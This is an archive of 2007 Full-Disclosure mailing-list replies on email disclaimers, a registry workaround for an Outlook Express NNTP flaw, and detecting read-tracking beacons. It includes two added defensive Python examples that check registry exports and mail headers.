messages to help protect themselves in the case of truly accidental 
disclosure (an employee accidentally mis-addressing the Email maybe???) 
they could claim to be practising a duty-of-care, but slapping such a 
notice on an auto-generated out-of-office message (and one that should 
not have been sent in response to a bulk mailing-list message anyway!) 
shows the limits of that duty-of-care, even suggesting that they are 
really applying a blanket "cover your arse" procedure rather than 
practising a real duty-of-care...


Regards,

Nick FitzGerald



Re: [Full-disclosure] Email Disclaimers...Legally Liable if breached?

2007-10-10 Thread Nick FitzGerald
Kelly Robinson wrote:

> It is common these days for email messages to contain a disclosure notice,
> which may include statements such as:
> 
>- You must read the notice
> 
>- The views expressed in the accompanying email are not necessarily
>those of the company
> 
>- The email and any attachments should be checked for viruses.
> 
>  Do these notices carry any *legal* force?  Why or Why not?

Do we look like "Lawyers'R'Us" ???

In which country's, or countries', legal system(s) are you going to 
apply the advice you get?

In general though, the feeling here (from past discussions of such 
things) is that they seem unlikely to be at all enforceable if they try 
to enforce an action or liability _on the receiver_ (the typical "if 
you are not the intended recipient of this message, immediately inform 
us, delete all copies, etc, etc" type thing) _and_ there is not already 
some kind of relationship between sender and receiver that may make 
such terms in some sense "reasonable".  However, if they are simple 
disclaimers of the _sender's_ responsibility they may well be 
meaningful (your typical "nothing in this message should be construed 
as legal [or financial] advice..." thing from law [financial/banking] 
firms, possibly your second example above though note the following 
point, etc).

There are further issues surrounding wordings such as "may", "could 
possibly", etc conjoined with absolute conditions, that suggest most 
companies that include these kinds of "disclaimers", "terms enforcers", 
etc never bothered to run the idea and/or wording past their lawyers, 
or they did but ignored the advice they got, or they have grossly 
incompetent lawyers...

Oh, and need I say IANAL ???


Regards,

Nick FitzGerald



Re: [Full-disclosure] iDefense Security Advisory 10.09.07: Microsoft Windows Mail and Outlook Express NNTP Protocol Heap Overflow

2007-10-10 Thread Nick FitzGerald
iDefense Labs wrote:

<<...>>
> V. WORKAROUND
> 
> Deleting the all sub-keys of the following registry keys will remove the
> 'news' and 'snews' protocol handlers:
> 
>   HKEY_CLASSES_ROOT\news\shell
>   HKEY_CLASSES_ROOT\snews\shell

If you want to do a thorough job of such mitigation as a Q&D fix, you 
may also need to nuke the 

   HKEY_CLASSES_ROOT\nntp\shell

entry.

I can't easily test the viability of exploiting this via an nntp:// URI 
just now, but "nntp" is normally registered (at least with OE -- can 
someone check for Windows Mail?) with exactly the same sub-keys and 
values as the "news" and "snews" URI handlers...


Regards,

Nick FitzGerald

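An added example, not from the post above or from iDefense, of how to verify that the workaround has been applied to all three of the handler keys named in the thread (news, snews and the nntp one the advisory omits). It parses the text that `reg export HKCR\news news.reg` (and the same for snews and nntp) writes out and reports which schemes still have sub-keys under `<scheme>\shell`. The registry export embedded below is constructed for the example: it shows news and snews already cleaned and nntp still live, and the msimn.exe command line is representative of an Outlook Express install rather than copied from a real machine.

```python
import re
from typing import Dict, List, Sequence

# The three URI schemes Outlook Express registers with the same shell
# sub-keys; "nntp" is the one the advisory's workaround leaves out.
HANDLERS = ("news", "snews", "nntp")

# Constructed sample of what `reg export` produces for the three keys after
# the advisory's workaround has been applied to news and snews only.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\news]
@="URL:News Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\news\shell]

[HKEY_CLASSES_ROOT\snews]
@="URL:Snews Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\snews\shell]

[HKEY_CLASSES_ROOT\nntp]
@="URL:NNTP Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\nntp\shell]

[HKEY_CLASSES_ROOT\nntp\shell\open]

[HKEY_CLASSES_ROOT\nntp\shell\open\command]
@="\"C:\\Program Files\\Outlook Express\\msimn.exe\" /newsurl:%1"
"""

# Matches a key line such as [HKEY_CLASSES_ROOT\nntp\shell\open\command]:
# anything below <scheme>\shell\ means the scheme can still launch a handler,
# which is exactly what the workaround (delete all sub-keys of ...\shell)
# is meant to remove.
_SHELL_SUBKEY = re.compile(
    r"^\[HKEY_CLASSES_ROOT\\([^\\\]]+)\\shell\\[^\]]+\]\s*$", re.IGNORECASE)


def live_shell_subkeys(reg_text: str) -> Dict[str, List[str]]:
    """Map each scheme to the shell sub-key lines still present in the export."""
    found: Dict[str, List[str]] = {}
    for line in reg_text.splitlines():
        m = _SHELL_SUBKEY.match(line.strip())
        if m:
            found.setdefault(m.group(1).lower(), []).append(line.strip())
    return found


def handler_status(reg_text: str, schemes: Sequence[str] = HANDLERS) -> Dict[str, bool]:
    """True for each scheme whose shell sub-keys survive, i.e. one the
    workaround has not yet been applied to."""
    live = live_shell_subkeys(reg_text)
    return {scheme: scheme in live for scheme in schemes}


def remaining_handlers(reg_text: str, schemes: Sequence[str] = HANDLERS) -> List[str]:
    """The schemes that still need their shell sub-keys deleted."""
    return [s for s, live in handler_status(reg_text, schemes).items() if live]


if __name__ == "__main__":
    print(handler_status(SAMPLE_EXPORT))      # {'news': False, 'snews': False, 'nntp': True}
    print(remaining_handlers(SAMPLE_EXPORT))  # ['nntp']
```

On a real machine the input would be the concatenated output of the three `reg export` runs; an empty result from `remaining_handlers` is the condition to look for before calling the mitigation complete.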


Re: [Full-disclosure] Testing DidTheyReadIt.com

2007-09-30 Thread Nick FitzGerald
Juha-Matti Laurio to Thierry Zoller:

[un-top-posted]
> > Just a sample test of how many of you read this email. Let's see how
> > good it performs for mailinglists and what comes out.
> 
> Your headers etc. doesn't state that this service is in use.

Maybe not _directly_, but comparing Received: headers in other Email 
Thierry has sent to Full-Disclosure from his @Zoller.lu address, you 
quickly see that hyperion.vo.lu is usually (??) the machine that 
injects such messages into the mail chain, whereas "his" test message 
was injected by colibri.e-mail-servers.com

Aside from being totally useless "against" those who use text-only 
MUAs, this kind of service is generally useless because increasingly, 
even vendors like MS realize that user privacy is actually somewhat 
important and increasingly make NOT retrieving remote images (and other 
content) in "rich text" Emails the default, rather than just providing 
an option to turn off such atrocities should the user be aware enough 
to go looking for such an option...

This is an example of a service that, in general, should not work, and 
in future will be increasingly more useless, I think.

In the meantime, all (???) those using it should be asking what kind of 
data leakage they are exposing themselves to, through possible message 
content scanning and sender/receiver address usage patterns, among 
others.


Regards,

Nick FitzGerald

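An added example, not part of the post above, of the two checks it describes: comparing the Received: chain of a suspect message against the sender's earlier posts to spot a different injection point, and listing the remote images an HTML body would fetch (the beacon a read-tracking service relies on). The two sample messages are constructed for the example, with the hostnames the post names (hyperion.vo.lu, colibri.e-mail-servers.com, lists.grok.org.uk) and made-up addresses, IDs and timestamps; the tracker URL is invented.

```python
import re
from email import message_from_string
from typing import Iterable, List, Optional

# Constructed sample messages (not the real posts from the thread).
USUAL_POST = """\
Received: from lists.grok.org.uk (lists.grok.org.uk [192.0.2.10])
\tby archive.example (Postfix) with ESMTP id 0001; Sat, 29 Sep 2007 12:00:02 +0000
Received: from hyperion.vo.lu (hyperion.vo.lu [192.0.2.20])
\tby lists.grok.org.uk (Postfix) with ESMTP id 0002; Sat, 29 Sep 2007 12:00:01 +0000
From: Thierry Zoller <thierry@zoller.lu>
To: full-disclosure@lists.grok.org.uk
Subject: an ordinary post

text
"""

TRACKED_POST = """\
Received: from lists.grok.org.uk (lists.grok.org.uk [192.0.2.10])
\tby archive.example (Postfix) with ESMTP id 0003; Sun, 30 Sep 2007 12:00:02 +0000
Received: from colibri.e-mail-servers.com (colibri.e-mail-servers.com [192.0.2.30])
\tby lists.grok.org.uk (Postfix) with ESMTP id 0004; Sun, 30 Sep 2007 12:00:01 +0000
From: Thierry Zoller <thierry@zoller.lu>
To: full-disclosure@lists.grok.org.uk
Subject: Testing DidTheyReadIt.com
Content-Type: text/html

<html><body><p>Just a sample test.</p>
<img src="http://tracker.example/beacon.gif?id=42" width="1" height="1">
<img src="cid:logo"></body></html>
"""

# "from <host> ..." at the start of an unfolded Received: value.
_FROM_HOST = re.compile(r"^from\s+([^\s(;]+)", re.IGNORECASE)
# <img ... src="http(s)://..."> in an HTML body; cid: and relative sources
# do not trigger a network fetch and are ignored.
_REMOTE_IMG = re.compile(
    r"<img\b[^>]*\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.IGNORECASE)


def received_chain(raw_message: str) -> List[str]:
    """Hosts named in the Received: headers, latest hop first.

    Each MTA prepends its own Received: line, so the last entry in this list
    is the machine that injected the message into the chain.
    """
    msg = message_from_string(raw_message)
    hosts: List[str] = []
    for value in msg.get_all("Received", []):
        m = _FROM_HOST.match(" ".join(str(value).split()))  # unfold first
        if m:
            hosts.append(m.group(1).lower())
    return hosts


def injecting_host(raw_message: str) -> Optional[str]:
    chain = received_chain(raw_message)
    return chain[-1] if chain else None


def unusual_injection(baseline: Iterable[str], suspect: str) -> bool:
    """True when the suspect message entered the mail chain from a host that
    none of the sender's earlier messages came from."""
    usual = {injecting_host(m) for m in baseline} - {None}
    return injecting_host(suspect) not in usual


def remote_image_urls(html: str) -> List[str]:
    """Remote <img> sources in an HTML body; a 1x1 beacon is how a
    read-tracking service learns that the message was rendered."""
    return _REMOTE_IMG.findall(html)


if __name__ == "__main__":
    print(received_chain(USUAL_POST))                 # latest hop first
    print(injecting_host(TRACKED_POST))               # colibri.e-mail-servers.com
    print(unusual_injection([USUAL_POST], TRACKED_POST))
    print(remote_image_urls(message_from_string(TRACKED_POST).get_payload()))
```

Received: headers above the first hop are added by machines the sender does not control and are the only part of the trace that cannot be forged by the sender, which is why comparing injection points across a sender's messages is more telling than anything in the From: line.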


Re: [Full-disclosure] What does everyone make of this

2007-09-13 Thread Nick FitzGerald
[EMAIL PROTECTED] wrote:

> > "posted on 11-9-2007 @ 01:09 PM".
> 
> European style, day-month-year.

Since when did "European" mean "pretty much anything outside the US/Nth 
America"???

You yanks really should get over your backward view of dates, just as 
you Northern Hemisphericals should get over referring to (roughly) the 
months June, July and August as "summer" when addressing a potentially 
international audience...


Regards,

Nick FitzGerald


